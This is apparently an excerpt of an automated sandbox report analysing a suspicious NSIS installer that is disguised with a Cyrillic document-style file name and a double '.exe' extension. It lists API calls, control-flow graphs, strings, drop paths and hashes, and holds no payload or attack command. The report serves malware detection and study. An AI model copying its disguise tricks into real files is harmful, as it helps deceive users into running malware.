                                                            • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 900638850-3873174082
                                                            • Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                            • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                            • Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                            • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 488 405841-405867 call 405b0c 491 405880-405887 488->491 492 405869-40587b DeleteFileW 488->492 494 405889-40588b 491->494 495 40589a-4058aa call 406050 491->495 493 4059fd-405a01 492->493 496 405891-405894 494->496 497 4059ab-4059b0 494->497 503 4058b9-4058ba call 405a50 495->503 504 4058ac-4058b7 lstrcatW 495->504 496->495 496->497 497->493 499 4059b2-4059b5 497->499 501 4059b7-4059bd 499->501 502 4059bf-4059c7 call 406393 499->502 501->493 502->493 512 4059c9-4059dd call 405a04 call 4057f9 502->512 505 4058bf-4058c3 503->505 504->505 508 4058c5-4058cd 505->508 509 4058cf-4058d5 lstrcatW 505->509 508->509 511 4058da-4058f6 lstrlenW FindFirstFileW 508->511 509->511 513 4059a0-4059a4 511->513 514 4058fc-405904 511->514 528 4059f5-4059f8 call 4051af 512->528 529 4059df-4059e2 512->529 513->497 516 4059a6 513->516 517 405924-405938 call 406050 514->517 518 405906-40590e 514->518 516->497 530 40593a-405942 517->530 531 40594f-40595a call 4057f9 517->531 520 405910-405918 518->520 521 405983-405993 FindNextFileW 518->521 520->517 524 40591a-405922 520->524 521->514 527 405999-40599a FindClose 521->527 524->517 524->521 527->513 528->493 529->501 534 4059e4-4059f3 call 4051af call 405ef1 529->534 530->521 535 405944-40594d call 405841 530->535 540 40597b-40597e call 4051af 531->540 541 40595c-40595f 531->541 534->493 535->521 540->521 544 405961-405971 call 4051af call 405ef1 541->544 545 405973-405979 541->545 544->521 545->521
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\*.*,\*.*), ref: 004058B2
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 004058D5
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\*.*,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                            • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\*.*,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                            • FindClose.KERNEL32(00000000), ref: 0040599A
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\*.*, xrefs: 0040589A, 004058A0, 004058B1, 004058EA
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                            • "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe", xrefs: 00405841
                                                            • \*.*, xrefs: 004058AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\*.*$\*.*
                                                            • API String ID: 2035342205-123856557
                                                            • Opcode ID: 0834fff36565ee898563603d92d026ad614ba3aa6e0f956547113d163bc73b70
                                                            • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                            • Opcode Fuzzy Hash: 0834fff36565ee898563603d92d026ad614ba3aa6e0f956547113d163bc73b70
                                                            • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(76F93420,00430298,C:\,00405B55,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                            • FindClose.KERNEL32(00000000), ref: 004063AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: C:\
                                                            • API String ID: 2295610775-3404278061
                                                            • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                            • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                            • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                            • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 182 403c3c-403c4e 183 403c54-403c5a 182->183 184 403d8f-403d9e 182->184 183->184 185 403c60-403c69 183->185 186 403da0-403de8 GetDlgItem * 2 call 404114 SetClassLongW call 40140b 184->186 187 403ded-403e02 184->187 191 403c6b-403c78 SetWindowPos 185->191 192 403c7e-403c81 185->192 186->187 189 403e42-403e47 call 404160 187->189 190 403e04-403e07 187->190 204 403e4c-403e67 189->204 196 403e09-403e14 call 401389 190->196 197 403e3a-403e3c 190->197 191->192 193 403c83-403c95 ShowWindow 192->193 194 403c9b-403ca1 192->194 193->194 199 403ca3-403cb8 DestroyWindow 194->199 200 403cbd-403cc0 194->200 196->197 217 403e16-403e35 SendMessageW 196->217 197->189 203 4040e1 197->203 206 4040be-4040c4 199->206 208 403cc2-403cce SetWindowLongW 200->208 209 403cd3-403cd9 200->209 205 4040e3-4040ea 203->205 211 403e70-403e76 204->211 212 403e69-403e6b call 40140b 204->212 206->203 218 4040c6-4040cc 206->218 208->205 215 403d7c-403d8a call 40417b 209->215 216 403cdf-403cf0 GetDlgItem 209->216 213 403e7c-403e87 211->213 214 40409f-4040b8 DestroyWindow KiUserCallbackDispatcher 211->214 212->211 213->214 220 403e8d-403eda call 406072 call 404114 * 3 GetDlgItem 213->220 214->206 215->205 221 403cf2-403d09 SendMessageW IsWindowEnabled 216->221 222 403d0f-403d12 216->222 217->205 218->203 224 4040ce-4040d7 ShowWindow 218->224 252 403ee4-403f20 ShowWindow KiUserCallbackDispatcher call 404136 EnableWindow 220->252 253 403edc-403ee1 220->253 221->203 221->222 226 403d14-403d15 222->226 227 403d17-403d1a 222->227 224->203 230 403d45-403d4a call 4040ed 226->230 231 403d28-403d2d 227->231 232 403d1c-403d22 227->232 230->215 235 403d63-403d76 SendMessageW 231->235 237 403d2f-403d35 231->237 232->235 236 403d24-403d26 232->236 235->215 236->230 240 403d37-403d3d call 40140b 237->240 241 403d4c-403d55 call 40140b 237->241 248 403d43 240->248 241->215 250 403d57-403d61 241->250 248->230 250->248 256 403f22-403f23 252->256 257 403f25 252->257 253->252 258 403f27-403f55 GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 403f57-403f68 SendMessageW 258->259 260 403f6a 258->260 261 403f70-403fae call 404149 call 406050 lstrlenW call 406072 SetWindowTextW call 401389 259->261 260->261 261->204 270 403fb4-403fb6 261->270 270->204 271 403fbc-403fc0 270->271 272 403fc2-403fc8 271->272 273 403fdf-403ff3 DestroyWindow 271->273 272->203 274 403fce-403fd4 272->274 273->206 275 403ff9-404026 CreateDialogParamW 273->275 274->204 276 403fda 274->276 275->206 277 40402c-404083 call 404114 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->203 277->203 282 404085-404098 ShowWindow call 404160 277->282 284 40409d 282->284 284->206
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                            • ShowWindow.USER32(?), ref: 00403C95
                                                            • DestroyWindow.USER32 ref: 00403CA9
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                            • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                            • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                            • EnableWindow.USER32(?,?), ref: 00403F18
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                            • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                            • lstrlenW.KERNEL32(0042D248,?,0042D248,petrels), ref: 00403F89
                                                            • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                            • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: petrels
                                                            • API String ID: 3282139019-2852237890
                                                            • Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                            • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                            • Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                            • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 285 403899-4038b1 call 40642a 288 4038b3-4038c3 call 405f97 285->288 289 4038c5-4038fc call 405f1d 285->289 298 40391f-403948 call 403b6f call 405b0c 288->298 294 403914-40391a lstrcatW 289->294 295 4038fe-40390f call 405f1d 289->295 294->298 295->294 303 4039da-4039e2 call 405b0c 298->303 304 40394e-403953 298->304 310 4039f0-403a15 LoadImageW 303->310 311 4039e4-4039eb call 406072 303->311 304->303 306 403959-403981 call 405f1d 304->306 306->303 312 403983-403987 306->312 314 403a96-403a9e call 40140b 310->314 315 403a17-403a47 RegisterClassW 310->315 311->310 316 403999-4039a5 lstrlenW 312->316 317 403989-403996 call 405a31 312->317 328 403aa0-403aa3 314->328 329 403aa8-403ab3 call 403b6f 314->329 318 403b65 315->318 319 403a4d-403a91 SystemParametersInfoW CreateWindowExW 315->319 323 4039a7-4039b5 lstrcmpiW 316->323 324 4039cd-4039d5 call 405a04 call 406050 316->324 317->316 322 403b67-403b6e 318->322 319->314 323->324 327 4039b7-4039c1 GetFileAttributesW 323->327 324->303 331 4039c3-4039c5 327->331 332 4039c7-4039c8 call 405a50 327->332 328->322 338 403ab9-403ad3 ShowWindow call 4063ba 329->338 339 403b3c-403b3d call 405282 329->339 331->324 331->332 332->324 344 403ad5-403ada call 4063ba 338->344 345 403adf-403af1 GetClassInfoW 338->345 343 403b42-403b44 339->343 346 403b46-403b4c 343->346 347 403b5e-403b60 call 40140b 343->347 344->345 350 403af3-403b03 GetClassInfoW RegisterClassW 345->350 351 403b09-403b2c DialogBoxParamW call 40140b 345->351 346->328 352 403b52-403b59 call 40140b 346->352 347->318 350->351 356 403b31-403b3a call 4037e9 351->356 352->328 356->322
                                                            APIs
                                                              • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                              • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                            • lstrcatW.KERNEL32(1033,0042D248), ref: 0040391A
                                                            • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,76F93420), ref: 0040399A
                                                            • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                            • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 004039B8
                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean), ref: 00403A01
                                                              • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                            • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                            • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                            • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 1975747703-129453298
                                                            • Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                            • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                            • Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                            • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 359 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 362 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 359->362 363 402e3e-402e43 359->363 371 402f63-402f71 call 402d8a 362->371 372 402e7c 362->372 364 403020-403024 363->364 379 402f73-402f76 371->379 380 402fc6-402fcb 371->380 374 402e81-402e98 372->374 376 402e9a 374->376 377 402e9c-402ea5 call 403242 374->377 376->377 384 402eab-402eb2 377->384 385 402fcd-402fd5 call 402d8a 377->385 382 402f78-402f90 call 403258 call 403242 379->382 383 402f9a-402fc4 GlobalAlloc call 403258 call 403027 379->383 380->364 382->380 405 402f92-402f98 382->405 383->380 410 402fd7-402fe8 383->410 389 402eb4-402ec8 call 405be0 384->389 390 402f2e-402f32 384->390 385->380 395 402f3c-402f42 389->395 408 402eca-402ed1 389->408 394 402f34-402f3b call 402d8a 390->394 390->395 394->395 401 402f51-402f5b 395->401 402 402f44-402f4e call 4064db 395->402 401->374 409 402f61 401->409 402->401 405->380 405->383 408->395 412 402ed3-402eda 408->412 409->371 413 402ff0-402ff5 410->413 414 402fea 410->414 412->395 416 402edc-402ee3 412->416 415 402ff6-402ffc 413->415 414->413 415->415 417 402ffe-403019 SetFilePointer call 405be0 415->417 416->395 418 402ee5-402eec 416->418 421 40301e 417->421 418->395 420 402eee-402f0e 418->420 420->380 422 402f14-402f18 420->422 421->364 423 402f20-402f28 422->423 424 402f1a-402f1e 422->424 423->395 425 402f2a-402f2c 423->425 424->409 424->423 425->395
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402DFF
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,00000400,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00402E1B
                                                              • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,80000000,00000003,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405C29
                                                              • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405C4B
                                                            • GetFileSize.KERNEL32(00000000,00000000,#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,80000000,00000003,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00402E67
                                                            Strings
                                                            • Inst, xrefs: 00402ED3
                                                            • C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
                                                            • Error launching installer, xrefs: 00402E3E
                                                            • #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe, xrefs: 00402E5B
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                            • Null, xrefs: 00402EE5
                                                            • "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe", xrefs: 00402DEE
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                            • soft, xrefs: 00402EDC
                                                            • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"$#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                            • API String ID: 4283519449-33457172
                                                            • Opcode ID: 4729afc4a2bc79e00c0e023e2ab6c8ffc7a99b4d600d51413185b8898656beba
                                                            • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                            • Opcode Fuzzy Hash: 4729afc4a2bc79e00c0e023e2ab6c8ffc7a99b4d600d51413185b8898656beba
                                                            • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C
